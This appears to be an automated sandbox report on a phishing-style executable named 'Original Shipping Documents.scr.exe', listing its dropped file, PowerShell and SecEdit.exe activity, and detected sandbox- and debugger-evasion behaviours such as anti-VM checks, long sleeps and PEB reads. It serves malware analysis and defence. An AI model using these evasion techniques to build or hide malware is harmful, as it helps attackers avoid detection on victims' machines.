Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\SecEdit.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\SecEdit.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\SecEdit.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\SecEdit.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\SecEdit.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: Original Shipping Documents.scr.exe PID: 8004, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: xHOAJKcJeCXuc.exe PID: 7516, type: MEMORYSTR

Switches to a custom stack to bypass stack traces

Source: C:\Windows\SysWOW64\SecEdit.exe	API/Special instruction interceptor: Address: 7FFCC372D324
Source: C:\Windows\SysWOW64\SecEdit.exe	API/Special instruction interceptor: Address: 7FFCC372D7E4
Source: C:\Windows\SysWOW64\SecEdit.exe	API/Special instruction interceptor: Address: 7FFCC372D944
Source: C:\Windows\SysWOW64\SecEdit.exe	API/Special instruction interceptor: Address: 7FFCC372D504
Source: C:\Windows\SysWOW64\SecEdit.exe	API/Special instruction interceptor: Address: 7FFCC372D544
Source: C:\Windows\SysWOW64\SecEdit.exe	API/Special instruction interceptor: Address: 7FFCC372D1E4
Source: C:\Windows\SysWOW64\SecEdit.exe	API/Special instruction interceptor: Address: 7FFCC3730154
Source: C:\Windows\SysWOW64\SecEdit.exe	API/Special instruction interceptor: Address: 7FFCC372DA44

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Memory allocated: 2F20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Memory allocated: 3010000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Memory allocated: 2F20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Memory allocated: 9E60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Memory allocated: 7730000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Memory allocated: AE60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Memory allocated: BE60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Memory allocated: C4A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Memory allocated: D4A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Memory allocated: 1240000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Memory allocated: 2FD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Memory allocated: 1410000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Memory allocated: 8CD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Memory allocated: 9CD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Memory allocated: 9EC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Memory allocated: AEC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Memory allocated: B5A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Memory allocated: C5A0000 memory reserve \| memory write watch	Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe

Code function: 8_2_01A8096E rdtsc

8_2_01A8096E

Contains long sleeps (>= 3 min)

Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7922	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1808	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8422	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1265	Jump to behavior
Source: C:\Windows\SysWOW64\SecEdit.exe	Window / User API: threadDelayed 1452
Source: C:\Windows\SysWOW64\SecEdit.exe	Window / User API: threadDelayed 8521

Found large amount of non-executed APIs

Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	API coverage: 0.7 %
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	API coverage: 0.3 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe TID: 8024	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7212	Thread sleep count: 7922 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7212	Thread sleep count: 1808 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7184	Thread sleep time: -8301034833169293s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7512	Thread sleep time: -11990383647911201s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe TID: 7820	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\SecEdit.exe TID: 7208	Thread sleep count: 1452 > 30
Source: C:\Windows\SysWOW64\SecEdit.exe TID: 7208	Thread sleep time: -2904000s >= -30000s
Source: C:\Windows\SysWOW64\SecEdit.exe TID: 7208	Thread sleep count: 8521 > 30
Source: C:\Windows\SysWOW64\SecEdit.exe TID: 7208	Thread sleep time: -17042000s >= -30000s
Source: C:\Program Files (x86)\fgJkuavujWhdydWUgAnvsfqKzPnxpZWUEwvbYqNLcUuK\xBk0IlKjg.exe TID: 7268	Thread sleep time: -55000s >= -30000s
Source: C:\Program Files (x86)\fgJkuavujWhdydWUgAnvsfqKzPnxpZWUEwvbYqNLcUuK\xBk0IlKjg.exe TID: 7268	Thread sleep time: -40500s >= -30000s

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\SecEdit.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\SecEdit.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: Original Shipping Documents.scr.exe, 00000000.00000002.1477840807.0000000009960000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: qeMUJJWMAS
Source: SecEdit.exe, 00000010.00000002.3849651901.0000000002A1D000.00000004.00000020.00020000.00000000.sdmp, xBk0IlKjg.exe, 00000011.00000002.3849327859.0000000000C79000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000014.00000002.2057427716.0000020FC398C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe

Process information queried: ProcessInformation

Jump to behavior

Checks if the current process is being debugged

Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Process queried: DebugPort
Source: C:\Windows\SysWOW64\SecEdit.exe	Process queried: DebugPort

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe

Code function: 8_2_01A8096E rdtsc

8_2_01A8096E

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe

Code function: 8_2_00417A63 LdrLoadDll,

8_2_00417A63

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AFC188 mov eax, dword ptr fs:[00000030h]	8_2_01AFC188
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AFC188 mov eax, dword ptr fs:[00000030h]	8_2_01AFC188
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A80185 mov eax, dword ptr fs:[00000030h]	8_2_01A80185
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AE4180 mov eax, dword ptr fs:[00000030h]	8_2_01AE4180
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AE4180 mov eax, dword ptr fs:[00000030h]	8_2_01AE4180
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AC019F mov eax, dword ptr fs:[00000030h]	8_2_01AC019F
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AC019F mov eax, dword ptr fs:[00000030h]	8_2_01AC019F
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AC019F mov eax, dword ptr fs:[00000030h]	8_2_01AC019F
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AC019F mov eax, dword ptr fs:[00000030h]	8_2_01AC019F
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A3A197 mov eax, dword ptr fs:[00000030h]	8_2_01A3A197
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A3A197 mov eax, dword ptr fs:[00000030h]	8_2_01A3A197
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A3A197 mov eax, dword ptr fs:[00000030h]	8_2_01A3A197
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01B161E5 mov eax, dword ptr fs:[00000030h]	8_2_01B161E5
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A701F8 mov eax, dword ptr fs:[00000030h]	8_2_01A701F8
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01B061C3 mov eax, dword ptr fs:[00000030h]	8_2_01B061C3
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01B061C3 mov eax, dword ptr fs:[00000030h]	8_2_01B061C3
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01ABE1D0 mov eax, dword ptr fs:[00000030h]	8_2_01ABE1D0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01ABE1D0 mov eax, dword ptr fs:[00000030h]	8_2_01ABE1D0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01ABE1D0 mov ecx, dword ptr fs:[00000030h]	8_2_01ABE1D0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01ABE1D0 mov eax, dword ptr fs:[00000030h]	8_2_01ABE1D0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01ABE1D0 mov eax, dword ptr fs:[00000030h]	8_2_01ABE1D0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A70124 mov eax, dword ptr fs:[00000030h]	8_2_01A70124
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AEE10E mov eax, dword ptr fs:[00000030h]	8_2_01AEE10E
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AEE10E mov ecx, dword ptr fs:[00000030h]	8_2_01AEE10E
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AEE10E mov eax, dword ptr fs:[00000030h]	8_2_01AEE10E
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AEE10E mov eax, dword ptr fs:[00000030h]	8_2_01AEE10E
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AEE10E mov ecx, dword ptr fs:[00000030h]	8_2_01AEE10E
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AEE10E mov eax, dword ptr fs:[00000030h]	8_2_01AEE10E
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AEE10E mov eax, dword ptr fs:[00000030h]	8_2_01AEE10E
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AEE10E mov ecx, dword ptr fs:[00000030h]	8_2_01AEE10E
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AEE10E mov eax, dword ptr fs:[00000030h]	8_2_01AEE10E
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AEE10E mov ecx, dword ptr fs:[00000030h]	8_2_01AEE10E
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01B00115 mov eax, dword ptr fs:[00000030h]	8_2_01B00115
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AEA118 mov ecx, dword ptr fs:[00000030h]	8_2_01AEA118
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AEA118 mov eax, dword ptr fs:[00000030h]	8_2_01AEA118
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AEA118 mov eax, dword ptr fs:[00000030h]	8_2_01AEA118
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AEA118 mov eax, dword ptr fs:[00000030h]	8_2_01AEA118
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AD4144 mov eax, dword ptr fs:[00000030h]	8_2_01AD4144
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AD4144 mov eax, dword ptr fs:[00000030h]	8_2_01AD4144
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AD4144 mov ecx, dword ptr fs:[00000030h]	8_2_01AD4144
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AD4144 mov eax, dword ptr fs:[00000030h]	8_2_01AD4144
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AD4144 mov eax, dword ptr fs:[00000030h]	8_2_01AD4144
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A46154 mov eax, dword ptr fs:[00000030h]	8_2_01A46154
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A46154 mov eax, dword ptr fs:[00000030h]	8_2_01A46154
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A3C156 mov eax, dword ptr fs:[00000030h]	8_2_01A3C156
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AD8158 mov eax, dword ptr fs:[00000030h]	8_2_01AD8158
